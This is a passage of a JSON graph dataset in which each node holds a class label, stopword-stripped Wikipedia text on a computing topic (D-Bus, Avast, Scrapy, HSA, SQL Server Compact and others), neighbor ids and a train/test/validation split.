specification defines wire protocol build d-bus messages exchanged processes within d-bus connection however define underlying transport method delivering messages existing d-bus implementations follow architecture reference implementation architecture consists two main components library equivalent internally uses native lower-level ipc mechanism transport required d-bus messages two processes ends d-bus connection d-bus specification n't mandate particular ipc transport mechanisms available use communications library decides transport methods supports instance linux unix-like operating systems typically uses unix domain sockets underlying transport method also supports tcp sockets communications libraries processes must agree selected transport method also particular channel used communication information defined d-bus calls address unix-domain socket filesystem objects therefore identified filename valid address would codice_1 processes must pass address respective communications libraries establish d-bus connection address also provide additional data communications library form comma-separated codice_2 pairs way example provide authentication information specific type connection supports message bus daemon like used implement d-bus bus processes want connect bus must know bus address address process establish d-bus connection central message bus process scenario message bus daemon selects bus address remainder processes must pass value corresponding equivalent libraries defines different bus address every bus instance provides addresses defined daemon configuration files two processes use d-bus connection exchange messages directly way d-bus normally intended used usual way always use message bus daemon i.e communications central point process establish point-to-point d-bus connection process —client service— sends d-bus message message bus process receives first instance delivers appropriate recipient message bus daemon may seen hub router charge getting message destination repeating d-bus connection recipient process recipient process determined destination bus name message header field subscription information signals maintained message bus daemon case signal propagation messages message bus daemon also produce messages response certain conditions error message process sent message nonexistent bus name d-bus started 2002 havoc pennington alex larsson red hat anders carlsson version 1.0 —considered api stable— released november 2006 heavily influenced dcop system used versions 2 3 kde d-bus replaced dcop kde 4 release implementation d-bus supports posix operating systems port windows exists used qt 4 gnome gnome gradually replaced parts earlier bonobo mechanism also used xfce one earlier adopters nowadays deprecated hardware abstraction layer hal used d-bus export information hardware added removed computer usage d-bus steadily expanding beyond initial scope desktop environments cover increasing amount system services instance networkmanager network daemon bluez bluetooth stack pulseaudio sound server use d-bus provide part services systemd uses d-bus wire protocol communication systemd also promoting traditional system daemons d-bus services logind another heavy user d-bus polkit whose policy authority daemon implemented service connected system bus also used wire protocol alljoyn protocol home automation end alljoyn adds discovery session management security header compression embedded device support makes transport agnostic although several implementations d-bus widely used reference implementation libdbus developed freedesktop.org project designed specification however libdbus low-level implementation never meant used directly application developers reference guide reimplementations d-bus included standard libraries desktop environments programming language bindings freedesktop.org project recommends applications authors use one higher level bindings implementations instead predominance libdbus used d-bus implementation caused terms d-bus libdbus often used interchangeably leading confusion gdbus implementation d-bus based gio streams included glib aiming used gtk+ gnome gdbus wrapper libdbus complete independent reimplementation d-bus specification protocol mate desktop xfce version 4.14 also based gtk+ 3 also use gdbus qtdbus implementation d-bus included qt library since version 4.2 component used kde applications libraries components access d-bus services available system 2013 systemd project rewrote libdbus effort simplify code also resulted significant increase overall d-bus performance preliminary benchmarks bmw found systemd d-bus library increased performance 360 version 221 systemd sd-bus api declared stable libnih project provides light-weight standard library c support d-bus additionally good support cross compiling kdbus project aimed reimplement d-bus kernel-mediated peer-to-peer inter-process communication mechanism beside performance improvements kdbus would advantages arising linux kernel features namespaces auditing security kernel mediating closing race conditions allowing d-bus used boot shutdown needed systemd kdbus inclusion linux kernel proved controversial dropped favor bus1 generic inter-process communication several programming language bindings d-bus developed java c ruby",
    "neighbors": [
      2432,
      11394,
      9225,
      2955,
      6413,
      7181,
      7309,
      8848,
      4113,
      9872,
      3859,
      8344,
      7450,
      2971,
      6555,
      9245,
      1822,
      543,
      7584,
      6691,
      5029,
      4902,
      4519,
      10024,
      10924,
      5677,
      2222,
      7983,
      8621,
      1586,
      1842,
      1972,
      8499,
      9908,
      823,
      11322,
      2109,
      3649,
      8262,
      3015,
      4423,
      8396,
      3407,
      6991,
      4177,
      5078,
      6487,
      1112,
      3033,
      7384,
      479,
      5471,
      9441,
      5095,
      4459,
      5612,
      4589,
      8685,
      9455,
      6257,
      2804,
      3189,
      3828,
      6389,
      8438,
      10486,
      2045,
      11135
    ],
    "mask": "Test"
  },
  {
    "node_id": 6695,
    "label": 0,
    "text": "Automated_journalism:automated journalism automated journalism also known algorithmic journalism robot journalism news articles generated computer programs artificial intelligence ai software stories produced automatically computers rather human reporters programs interpret organize present data human-readable ways typically process involves algorithm scans large amounts provided data selects assortment pre-programmed article structures orders key points inserts details names places amounts rankings statistics figures output also customized fit certain voice tone style data science ai companies automated insights narrative science united robots yseop develop provide algorithms news outlets 2016 media organizations used automated journalism early adopters include news providers associated press forbes propublica los angeles times due formulaic nature automation mainly used stories based statistics numerical figures common topics include sports recaps weather financial reports real estate analysis earnings reviews statsheet online platform covering college basketball runs entirely automated program associated press began using automation cover 10,000 minor baseball leagues games annually using program automated insights statistics mlb advanced media outside sports associated press also uses automation produce stories corporate earnings 2006 thomson reuters announced switch automation generate financial news stories online news platform famously algorithm called quakebot published story 2014 california earthquake los angeles times website within three minutes shaking stopped automated journalism sometimes seen opportunity free journalists routine reporting providing time complex tasks also allows efficiency cost-cutting alleviating financial burden many news organizations face however automated journalism also perceived threat authorship quality news precarity employment within industry robot reporters built produce large quantities information quicker speeds associated press announced use automation increased volume earnings reports customers ten times software automated insights data companies produce 150 300-word articles time takes journalists crunch numbers prepare information automating routine stories tasks journalists promised time complex jobs investigative reporting in-depth analysis events francesco marconi associated press stated automation news agency freed 20 percent reporters ’ time focus higher-impact projects automated journalism cheaper content produced within less time also lowers labour costs news organizations reduced human input means less expenses wages salaries paid leaves vacations employment insurance automation serves cost-cutting tool news outlets struggling tight budgets still wish maintain scope quality coverage automated story often confusion credited author several participants study algorithmic authorship attributed credit programmer others perceived news organization author emphasizing collaborative nature work also way reader verify whether article written robot human raises issues transparency concerns perceived credibility automated news critics doubt algorithms fair accurate free subjectivity error attempted influence also remarked machines replace human capabilities creativity humour critical-thinking computers alone lack ability write stories perspective emotion thorough analysis surprising observations among concerns automation loss employment journalists interest saving costs mentioned previously news organizations inclined cut staff switching cheaper faster machines 2014 annual census american society news editors announced newspaper industry lost 3,800 full-time professional editors falling 10 within year biggest drop since industry cut 10,000 jobs 2007 2008 future automated journalism seen beneficial however others would argue could detrimental industry removes sense objectivity stated benefits section costs efficiency robot journalism present proven however utilizing system automation may separate audience article happen human journalist writing world issues may personal writing style attached story whereas article written using automation would result story bland personality automated articles written within firm would style similar sense journalist would lost process question regarding issue problems exist current technologies 2020s industry may change new technological advancements may made implement fix issues currently associated thought using robot journalism nieman reports article identifies whether machines replace journalists addresses many concerns around concept automated journalism practices discuss benefits surrounding concepts automated journalism beneficial industry however ultimately support idea human journalists stay around matter much technology changes rationale supported thought benefits automation never outweigh perks skilled journalist date current technological advancements due journalism industry reliance technology industry must stay dynamic shift current trends professionals work within field must field competitive saturated due internet internet caused many shifts way industry operates also opened avenue citizen journalist participate media much frequently due many people owning smartphones access online databases media sites many people taken roles amateur journalists overall benefited industry efficiency perspective however seen hurting professionals work journalism field",
    "neighbors": [
      2440,
      1083,
      9656
    ],
    "mask": "None"
  },
  {
    "node_id": 6696,
    "label": 3,
    "text": "Él_(visual_novel):él visual novel elle also known japanese adult visual novel developed elf corporation originally released june 13 1991 remake produced elf corporation retitled él released september 29 2000 green bunny produced anime original video animation titled él released two volumes 2001 series depicts survivors nuclear war gathered single tightly-monitored city december 1999 nuclear war devastates earth renders world inhospitable ensure survival humanity megaroasu plan carried terrorist organization called black widow attacks tries disrupt plan story takes place 2008 player takes role unnamed hero unknown past expert marksman heroine el miles includes ensemble minor characters advance plot game simple click adventure one ending games genre 2000 remake story exception setting refocused 2030 graphics updated included three-dimensional computer graphics script dubbed cast professional voice actors cast credits private released nuclear war triggered environmental pollution group survivors start megaro earth project city built dome protect last fragments humanity el miles sniper – policewoman defending city terrorist organization black widows el placed charge protecting parsley pop singer nearly raped black widow operatives singer finds falling love el attempts seduces el discovers fellow snipers becoming black widow operatives constantly tormented leader gimmick also unusual blackouts unexplained visions another reality end second episode whole world el miles lived actually 'created dream el man named joe last humanity disrupted parsley first release titled elle originally released june 13 1991 remake produced elf corporation retitled él released september 29 2000 original release pc-9801 software four 5 2hd floppy disks remake released windows 95 98 2000 xp cd green bunny produced anime original video animation titled él released two volumes 2001 nutech digital acquired rights él ova 2001 english release volumes 1 2 box set would follow january 2002 featuring english dub included voice talents adult actresses shelbee myne lola ova credits include kazuma kanezawa director kazuma kanezawa wrote script designs masaki kawai takeo takahashi yukio segami production arms green bunny chris beveridge reviewed english localizations series nutech digital release originally reviewed 2002 positive noting strong visuals seconds cross coloration second episode kitty media release also reviewed favorably among differences nutech digital release redubbing work release strong points ova writing execution surprise ending large cast characters resulted poor development secondary characters visuals original release hold compared newer works 2007 review increasing industry standards",
    "neighbors": [
      11143,
      4425,
      2156,
      6797,
      9006,
      6776
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6697,
    "label": 2,
    "text": "List_of_features_removed_in_Windows_XP:list features removed windows xp next version windows nt windows 2000 well successor windows windows xp introduced many new features also removed others following list",
    "neighbors": [
      8576,
      641,
      3463,
      651,
      6797,
      7311,
      3856,
      8080,
      8976,
      10896,
      2196,
      11283,
      11413,
      4505,
      9372,
      4515,
      8355,
      11301,
      3496,
      6441,
      10924,
      1581,
      3250,
      3890,
      9910,
      6462,
      7615,
      321,
      7106,
      10051,
      582,
      1098,
      10957,
      9166,
      3283,
      4309,
      9173,
      2391,
      11605,
      3289,
      8281,
      4316,
      8798,
      11103,
      5600,
      1121,
      10338,
      2919,
      8296,
      5225,
      4074,
      6506,
      8299,
      8315,
      6510,
      5103,
      9448,
      10989,
      7796,
      6265,
      5243,
      636,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 6698,
    "label": 4,
    "text": "Information_Trust_Institute:information trust institute information trust institute iti founded 2004 interdisciplinary unit designed approach information security research systems perspective examines information security looking makes machines applications users trustworthy mission create computer systems software networks society depend trustworthy meaning secure dependable reliable available correct safe private survivable iti stated goal create new paradigm designing trustworthy systems ground validating systems intended trustworthy iti academic/industry partnership focusing application areas electric power financial systems defense homeland security among others brings together 100 researchers representing numerous colleges units university illinois urbana–champaign",
    "neighbors": [
      5373,
      5446,
      679
    ],
    "mask": "Test"
  },
  {
    "node_id": 6699,
    "label": 4,
    "text": "Avast_Antivirus:avast antivirus avast antivirus family internet security applications developed avast microsoft windows macos android ios avast antivirus products include free proprietary versions provide computer security browser security antivirus software firewall anti-phishing antispyware anti-spam among services 2017 avast popular antivirus vendor market largest share market antivirus applications avast programs available internet-connected devices available 45 languages avast product range includes following february 2018 test various antimalware products av-test avast free antivirus earned 6 6 points protection category detecting 100 malware samples used test earning av-test certified seal avast mobile security antivirus app also performed well detected 100 malware samples january 2018 test android malware av-comparatives",
    "neighbors": [
      2049,
      4994,
      131,
      5891,
      7809,
      1417,
      3981,
      6797,
      10637,
      9488,
      4374,
      1052,
      156,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      3885,
      8493,
      7983,
      8615,
      6834,
      4403,
      9523,
      10166,
      3643,
      7103,
      704,
      9537,
      7362,
      1475,
      10308,
      4421,
      202,
      1355,
      1994,
      5069,
      10574,
      10708,
      2005,
      8024,
      8998,
      1242,
      2907,
      8668,
      11225,
      2654,
      9055,
      9569,
      3941,
      11622,
      6762,
      6382,
      4464,
      9713,
      4722,
      3955,
      6643,
      10872,
      9341,
      2558,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6700,
    "label": 2,
    "text": "Game_Center:game center game center got removed home screen ios 10 update still exists today mac os also games ios pop open certain games ios today game center app released apple allows users play challenge friends playing online multiplayer social gaming network games games share multiplayer functionality mac ios versions app game center implemented developers ios 4.1 later mac os x 10.8 later gamekit framework game center available ipod touch 2nd generation later ios 4.1 higher required iphone 3gs later ios 4.1 higher required models ipad ios 4.2 higher required mac computers running os x 10.8 mountain lion later apple tv 4 running tvos apple watch running watchos 3 gaming became major part ios platform apple launched app store july 10 2008 unlike console systems currently market apple unified multiplayer social system platform gap soon filled third parties openfeint plus agon online scoreloop third parties control online gaming environment multiple third parties involved left non-unified experience game center announced ios 4 preview event hosted apple april 8 2010 preview released registered apple developers august released september 8 2010 ios 4.1 iphone 4 iphone 3gs ipod touch 2nd generation 4th generation included ios 4.2 ipad updated version game center released ios 5 featured addition turn-based gaming player photos friend suggestions achievement points ios 6 update added challenges way players challenge players beat leaderboard scores earn achievements june 13 2016 application removed ios 10 macos sierra however service still exists within game center players connect friends send friend requests start playing games organize online multiplayer games number friends connected single game center account limited 500 games may feature achievements completing certain task player rewarded points depending game leaderboard may present player compare score friends world many ios games use game center use every feature apps choose include following features supported game center",
    "neighbors": [
      10755,
      9732,
      4615,
      1549,
      5647,
      7697,
      1042,
      11289,
      6186,
      4139,
      4657,
      1074,
      8754,
      9784,
      8253,
      576,
      9802,
      8783,
      5713,
      4180,
      3670,
      1623,
      3672,
      4184,
      10838,
      2141,
      4702,
      3681,
      9826,
      2149,
      5733,
      8806,
      3691,
      8303,
      2673,
      6771,
      2676,
      6264,
      7292,
      2686,
      6783,
      7806,
      9343,
      10878,
      3719,
      10888,
      8842,
      11402,
      8852,
      1686,
      7318,
      5784,
      1177,
      4251,
      3228,
      2207,
      1699,
      11430,
      171,
      5292,
      8877,
      1710,
      2735,
      3248,
      3766,
      2232,
      9912,
      4283,
      3772,
      7869,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      7378,
      3286,
      9430,
      3289,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      2288,
      7928,
      8441,
      7420,
      7422,
      11521,
      2819,
      1796,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      11037,
      10023,
      811,
      3371,
      4399,
      7983,
      10036,
      7991,
      9529,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      4933,
      838,
      7496,
      9035,
      6993,
      2388,
      1878,
      4957,
      6495,
      9063,
      4457,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6539,
      7052,
      9100,
      1428,
      9109,
      3483,
      1439,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      6093,
      7118,
      464,
      6608,
      8662,
      9174,
      3035,
      4571,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      10221,
      7154,
      5619,
      11257,
      7163,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 6701,
    "label": 8,
    "text": "Scrapy:scrapy scrapy free open-source web-crawling framework written python originally designed web scraping also used extract data using apis general-purpose web crawler currently maintained scrapinghub ltd. web-scraping development services company scrapy project architecture built around spiders self-contained crawlers given set instructions following spirit n't repeat frameworks django makes easier build scale large crawling projects allowing developers reuse code scrapy also provides web-crawling shell used developers test assumptions site ’ behavior well-known companies products using scrapy lyst parse.ly sayone technologies sciences po medialab data.gov.uk ’ world government data site scrapy born london-based web-aggregation e-commerce company mydeco developed maintained employees mydeco insophia web-consulting company based montevideo uruguay first public release august 2008 bsd license milestone 1.0 release happening june 2015 2011 scrapinghub became new official maintainer",
    "neighbors": [
      418,
      8554,
      6797,
      8718,
      7983,
      113,
      5203,
      823,
      7325
    ],
    "mask": "Test"
  },
  {
    "node_id": 6702,
    "label": 2,
    "text": "OpenBSD_Foundation:openbsd foundation openbsd foundation canadian federal non-profit organization founded openbsd project single point contact persons organizations requiring legal entity deal wish support openbsd also serves legal safeguard projects affiliated openbsd including openssh openbgpd openntpd opencvs opensmtpd libressl announced public openbsd developer bob beck july 25 2007",
    "neighbors": [
      9223,
      10631,
      2825,
      3465,
      1932,
      274,
      7702,
      10105,
      9520,
      2245,
      1993,
      8778,
      3404,
      11086,
      5970,
      5084,
      7139,
      1637,
      4071,
      5230,
      1785,
      8954
    ],
    "mask": "None"
  },
  {
    "node_id": 6703,
    "label": 7,
    "text": "Software-defined_data_center:software-defined data center software-defined data center sddc also virtual data center vdc marketing term extends virtualization concepts abstraction pooling automation data center resources services achieve service itaas software-defined data center elements infrastructure — networking storage cpu security – virtualized delivered service itaas may represent outcome sddc sddc differently cast toward integrators datacenter builders rather toward tenants software awareness infrastructure visible tenants sddc support claimed wide variety approaches critics see software-defined data center marketing tool software-defined hype noting variability 2013 analyst projected least software-defined data center components would experience market growth software-defined networking market expected valued us 3.7 billion 2016 compared us 360 million 2013 idc estimates software-defined storage market poised expand faster storage market software-defined data center encompasses variety concepts data-center infrastructure components component potentially provisioned operated managed application programming interface api core architectural components comprise software-defined data center include following software-defined data center differs private cloud since private cloud offer virtual-machine self-service beneath could use traditional provisioning management instead sddc concepts imagine data center encompass private public hybrid clouds data centers traditionally lacked capacity accommodate total virtualization 2013 companies began laying foundation software-defined data centers virtualization ben cherian midokura considered amazon web services catalyst move toward software-defined data centers convinced world data center could abstracted much smaller units could treated disposable pieces technology turn could priced utility 2013 software-defined data center term promoted paradigm shift according steve herrod promise software-defined data center companies would longer need rely specialized hardware hire consultants install program hardware specialized language rather would define applications resources require—including compute storage networking security availability—and group required components create “ logical application. ” commonly cited benefits software-defined data centers include improved efficiency extending virtualization throughout data center increased agility provisioning applications quickly improved control application availability security policy-based governance flexibility run new existing applications multiple platforms clouds addition software-defined data center implementation could reduce company energy usage enabling servers data center hardware run decreased power levels turned believe software-defined data centers improve security giving organizations control hosted data security levels compared security provided hosted-cloud providers software-defined data center marketed drive prices data center hardware challenge traditional hardware vendors develop new ways differentiate products software services concepts software-defined general software-defined data centers particular dismissed “ nonsense ” “ marketecture ” “ software-defined hype. ” critics believe minority companies “ completely homogeneous systems ’ ” already place yahoo google transition software-defined data centers according observers software-defined data centers ’ necessarily eliminate challenges relate handling differences development production environments managing mix legacy new applications delivering service-level agreements slas software-defined networking seen essential software-defined data center also considered “ least mature technology ” required enable software-defined data center however several companies including arista networks cisco microsoft vmware market products enable virtual networks provisioned extended moved across existing physical networks several competing network virtualization standards already existed 2012 neutron networking component open-source software openstack project provides application-level abstraction network resources includes interface configuring virtual switches software-defined data center approach force organizations adapt software-defined environments require rethinking many processes—including automation metering billing—and executing service delivery service activation service assurance widespread transition sddc could take years",
    "neighbors": [
      5832,
      6153,
      2284,
      3086,
      1840,
      7248,
      982,
      8735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6704,
    "label": 5,
    "text": "Certificate_Management_over_CMS:certificate management cms certificate management cms cmc internet standard published ietf defining transport mechanisms cryptographic message syntax cms defined rfc 5272 transport mechanisms rfc 5273 one two protocols utilizing certificate request message format crmf described rfc 4211 protocol certificate management protocol cmp enrollment secure transport est protocol described rfc 7030 profile cmc use provisioning certificates end entities est play similar role scep",
    "neighbors": [
      10924,
      6993,
      7985,
      9909,
      2904,
      11387,
      5469,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 6705,
    "label": 3,
    "text": "Heterogeneous_System_Architecture:heterogeneous system architecture heterogeneous system architecture hsa cross-vendor set specifications allow integration central processing units graphics processors bus shared memory tasks hsa developed hsa foundation includes among many others amd arm platform stated aim reduce communication latency cpus gpus compute devices make various devices compatible programmer perspective relieving programmer task planning moving data devices disjoint memories must currently done opencl cuda cuda opencl well fairly advanced programming languages use hsa increase execution performance heterogeneous computing widely used system-on-chip devices tablets smartphones mobile devices video game consoles hsa allows programs use graphics processor floating point calculations without separate memory scheduling rationale behind hsa ease burden programmers offloading calculations gpu originally driven solely amd called fsa idea extended encompass processing units gpus manufacturers dsps well modern gpus well suited perform single instruction multiple data simd single instruction multiple threads simt modern cpus still optimized branching etc originally introduced embedded systems cell broadband engine sharing system memory directly multiple system actors makes heterogeneous computing mainstream heterogeneous computing refers systems contain multiple processing units central processing units cpus graphics processing units gpus digital signal processors dsps type application-specific integrated circuits asics system architecture allows accelerator instance graphics processor operate processing level system cpu among main features hsa defines unified virtual address space compute devices gpus traditionally memory separate main cpu memory hsa requires devices share page tables devices exchange data sharing pointers supported custom memory management units render interoperability possible also ease various aspects programming hsa intended isa-agnostic cpus accelerators support high-level programming languages far hsa specifications cover hsa intermediate layer hsail virtual instruction set parallel programs mobile devices one hsa application areas yields improved power efficiency block diagrams provide high-level illustrations hsa operates compares traditional architectures hsa-specific features implemented hardware need supported operating system kernel specific device drivers example support amd radeon amd firepro graphics cards apus based graphics core next gcn merged version 3.19 linux kernel mainline released 8 february 2015 programs interact directly queue jobs utilizing hsa runtime first implementation known focuses berlin apus works alongside existing radeon kernel graphics driver additionally supports heterogeneous queuing hq aims simplify distribution computational jobs among multiple cpus gpus programmer perspective support heterogeneous memory management hmm suited graphics hardware featuring version 2 amd iommu accepted linux kernel mainline version 4.14 integrated support hsa platforms announced sumatra release openjdk due 2015 amd app sdk amd proprietary software development kit targeting parallel computing available microsoft windows linux bolt c++ template library optimized heterogeneous computing gpuopen comprehends couple software tools related hsa codexl version 2.0 includes hsa profiler amd kaveri a-series apus cf kaveri desktop processors kaveri mobile processors sony playstation 4 allowed integrated gpu access memory via version 2 amd iommu earlier apus trinity richland included version 2 iommu functionality use external gpu connected via pci express post-2015 carrizo bristol ridge apus also include version 2 iommu functionality integrated gpu arm bifrost microarchitecture implemented mali-g71 fully compliant hsa 1.1 hardware specifications arm announced software support would use hardware feature",
    "neighbors": [
      3586,
      7173,
      9739,
      5645,
      7699,
      10260,
      5655,
      10781,
      8231,
      9255,
      5677,
      2094,
      7218,
      8250,
      1083,
      2623,
      2113,
      7234,
      3142,
      1614,
      2638,
      7247,
      1122,
      3175,
      8815,
      1137,
      630,
      8822,
      6268,
      3204,
      10375,
      7313,
      2719,
      6815,
      5793,
      6818,
      8352,
      8868,
      6821,
      7852,
      9391,
      7858,
      9911,
      9400,
      8890,
      4286,
      2241,
      2243,
      2764,
      5329,
      9427,
      10966,
      731,
      11485,
      5859,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      9475,
      1798,
      6926,
      6415,
      1298,
      11539,
      2850,
      6950,
      7978,
      309,
      8501,
      5948,
      4928,
      6978,
      8514,
      11080,
      6476,
      9551,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      1377,
      9057,
      10603,
      4465,
      2935,
      3960,
      6009,
      1399,
      1402,
      7033,
      11130,
      3457,
      9092,
      398,
      3470,
      5523,
      8609,
      9122,
      10658,
      9126,
      10669,
      1967,
      2480,
      11183,
      10675,
      1461,
      1463,
      7607,
      4030,
      3014,
      6087,
      466,
      7122,
      1499,
      1502,
      3042,
      995,
      5090,
      1510,
      9707,
      10734,
      6639,
      499,
      4596,
      3573,
      8700,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 6706,
    "label": 2,
    "text": "Applied_Data_Research:applied data research applied data research adr large software vendor 1960s mid-1980s adr often described first independent software vendor founded 1959 adr originally contract development company adr eventually built series products adr widely used major packages included autoflow automatic flowcharting roscoe metacobol extensible macro processor cobol language librarian source-code management adr later purchased datacom/db database management system insyte datacom developed companion product ideal interactive development environment application ’ life fourth-generation programming language another popular adr product librarian version control system ibm mainframe operating systems known ca librarian 1978 reported librarian use 3,000 sites decade later number doubled adr received first patent issued computer program sorting system april 23 1968 program developed martin a. goetz adr instigated litigation federal court ibm accusations ibm retarding growth independent software industry monopolizing software industry leading ibm famous 1969 1970 adr programmatics wholly owned subsidiary adr received out-of-court settlement 1.4 million ibm ibm also agreed serve supplier autoflow meant another potential 600,000 revenues adr adr licensed datacom/db tcsc firm sold modified versions ibm dos/360 dos/vs operating systems known edos 1980 nixdorf computer bought tcsc nixdorf sought continue licensing arrangement adr ncsc went court dispute whether licensing arrangement terminated acquisition adr nixdorf settled court 1981 agreement nixdorf could continue resell adr products adr bought massachusetts computer associates also known compass late 1960s adr sold ameritech 1986 kept intact subsidiary 1988 ameritech sold adr computer associates unrelated massachusetts computer associates subsequently rename ca technologies computer associates integrated company systems products division new information products division roscoe remote os conversational operating environment originally marketed roscoe last marketed ca-roscoe software product ibm mainframes text editor also provides operating system functionality ability submit batch jobs similar ispf xedit ability support 200+ concurrent active users still low overhead based single address space architecture rpf roscoe programming facility scripting language string processing capability",
    "neighbors": [
      6529,
      909,
      8687,
      9780,
      5463,
      3323,
      2813,
      6974
    ],
    "mask": "Test"
  },
  {
    "node_id": 6707,
    "label": 4,
    "text": "Blended_threat:blended threat blended threat also known blended attack software exploit turn involves combination attacks different vulnerabilities example many worm trojan horse computer virus exploit multiple techniques attack propagate kind computer threat blended threats combination worms trojan virus kinds malware recent years cyberattacks demonstrated increased ability impact physical systems stuxnet triton trisis malware 2017 ransomware outbreaks wannacry recognizing threats cyber systems exist potential physical hazards term blended threat also defined natural accidental purposeful physical cyber danger indicates potential crossover impacts harm life information operations environment and/or property adaptation based terminology 2010 us department homeland security risk lexicon symantec elaborated idea blended threats blog post noting malware begins become contained natural disaster hits region people need help flood medical centers researchers discover additional concerns inside malware ’ code type attack known “ blended threat ” – natural accidental purposeful combination physical cyber incident post describes private-sector infrastructure preparedness activities focused blended threats including planned healthcare sector higher education adding idea types crossover incidents considered blended threats august 2018 oracle wrote post observed incidents include number good examples one example approximately 20:00 gmt july 2 internet intelligence map country statistics view showed decline traceroute completion ratio dns query rate azerbaijan related widespread blackout metrics gradually recovered next day published reports reuters washington post noted blackout due explosion hydropower station following overload electrical system due increased use air conditioners driven heat wave saw temperatures exceed 100° f. another day later tropical storm maria caused islandwide power outage guam disrupted internet service island several hours venezuela experienced large power failure left capital city caracas without electricity caused disruption internet connectivity well shown figure traceroute dns metrics saw minor declines around 13:00 gmt read cited article black hat 2018 ruben santamarta reversemode provided another example cyber-physical threats demonstrated guardian summarized satellite communications ships planes military use connect internet vulnerable hackers worst-case scenario could carry 'cyber-physical attacks turning satellite antennas weapons operate essentially like microwave ovens",
    "neighbors": [
      3843,
      612,
      5636,
      7739,
      4487,
      10756,
      2041,
      3867,
      9375
    ],
    "mask": "None"
  },
  {
    "node_id": 6708,
    "label": 4,
    "text": "Smart_card_management_system:smart card management system smart card management system scms credential management system cms system managing smart cards life cycle smart cards thus system issue smart cards maintain smart cards use finally take smart cards use eol chip/smart cards provide foundation secure electronic identity used control access facilities networks computers smart cards security credentials authenticating smart card holder example using two-factor authentication security requirements smart card management system often high therefore vendors systems found computer security industry smart card management systems generally implemented software applications system needs accessible one operator user simultaneously normally case software application often provided form server application accessible several different client systems alternative approach multiple synchronized systems smart card management systems connect smart cards systems systems smart card management system must connect depends use case smart cards typical systems connect include smart card lifecycle smart card changing state examples states include issued blocked revoked process taking smart card one state another main responsibility smart card management system different smart card management systems call processes different names list widely used names processes listed briefly explained",
    "neighbors": [
      9745,
      2737,
      517,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6709,
    "label": 1,
    "text": "SQL_Server_Compact:sql server compact microsoft sql server compact sql ce compact relational database produced microsoft applications run mobile devices desktops prior introduction desktop platform known sql server windows ce sql server mobile edition includes 32-bit 64-bit native support sql ce targets occasionally connected applications applications embedded database free download redistribute odbc driver sql ce exist one planned native applications may use sql ce via ole db latest last release sql server compact 4.0 february 2013 sql server compact edition deprecated new versions updates planned although microsoft continue support july 2021 sql server compact shares common api microsoft sql server editions also includes ado.net providers data access using ado.net apis built-in synchronization capabilities well support linq entity framework future releases unify synchronization capabilities microsoft synchronization services unlike editions microsoft sql server sql ce runs in-process application hosting disk footprint less 2 mb memory footprint approximately 5 mb sql ce optimized architecture applications share memory pool windows store apps windows 8 use sql server compact edition edition sql server versions sql ce databases support acid-compliance meet durability requirement default autoflush buffers changes memory including enlisted ambient transactions explicit sql ce transactions override commit call commitmode.immediate value therefore committed transaction changes lost meet durability requirement commit call transaction must specify immediate flag like microsoft sql server sql ce supports transactions referential integrity constraints locking well multiple connections database store however nested transactions supported even though parallel transactions different tables current release support stored procedures native xml data type either uses subset t-sql querying due lack xml support xquery supported either queries processed optimizing query processor sql ce databases also support indexing well support remote data replication local caching data remote databases merge replication bidirectional synchronization master databases sql ce databases created managed microsoft visual studio older versions sql server management studio well sql ce databases reside single .sdf file 4 gb size .sdf file encrypted 128-bit encryption data security sql ce runtime mediates concurrent multi-user access .sdf file .sdf file simply copied destination system deployment deployed clickonce sql ce runtime support datadirectories applications using sql ce database need specify entire path .sdf file ado.net connection string rather specified |datadirectory|\\ database_name .sdf defining data directory .sdf database file resides defined assembly manifest application sql server management studio 2005 read modify ce 3.0 3.1 database files latest service pack sql server management studio 2008 later required read version 3.5 files microsoft visual studio express 2008 sp1 create modify query ce 3.5 sp1 database files sql server management studio read ce 4.0 files visual studio 2010 sp1 handle ce 4.0 database files .sdf sqlce database file naming convention optional extension used setting password database file optional database compressed repaired option compacted/repaired database placed new database file february 2013 microsoft announced sql server compact edition deprecated although new versions updates planned microsoft continue support sql compact standard lifecycle support policy support end july 2021",
    "neighbors": [
      4624,
      10388,
      10389,
      10900,
      10902,
      3224,
      5401,
      7064,
      5403,
      11030,
      2589,
      11414,
      4384,
      7456,
      8227,
      11683,
      11559,
      10921,
      4010,
      5546,
      1964,
      3629,
      430,
      4781,
      9263,
      10157,
      11570,
      8246,
      315,
      7486,
      10048,
      4674,
      1347,
      1348,
      9286,
      5320,
      4174,
      847,
      83,
      1366,
      9434,
      603,
      479,
      608,
      2401,
      4704,
      7523,
      8161,
      11616,
      3303,
      10986,
      11498,
      3821,
      10991,
      3573,
      9205,
      6775,
      5754,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 6710,
    "label": 5,
    "text": "Common_Indexing_Protocol:common indexing protocol common indexing protocol cip attempt ietf working group find mid-1990s define protocol exchanging index information directory services x.500 directory model searches scoped near root tree e.g particular country problematic implement potentially hundreds thousands directory servers would need contacted order handle query indexes contained summaries subsets information individuals organizations represented white pages schema merging subsets information multiple sources hoped index server holding subset could able process query efficiently chaining sources sources hold information would contacted example server holding base entry particular country provided list names people entries country subtree server would able process query searching person particular name chaining servers held data person protocol evolved earlier work developing whois++ intended capable interconnecting services evolving whois ldap activities protocol seen much recent deployment whois ldap environments followed separate evolution paths whois deployments typically domain name registrars data management issues addressed specifications domain name registry interconnection crisp contrast enterprises manage employee customer student identity data ldap directory looked federation protocols interconnection organizations",
    "neighbors": [
      6651,
      8204,
      9429,
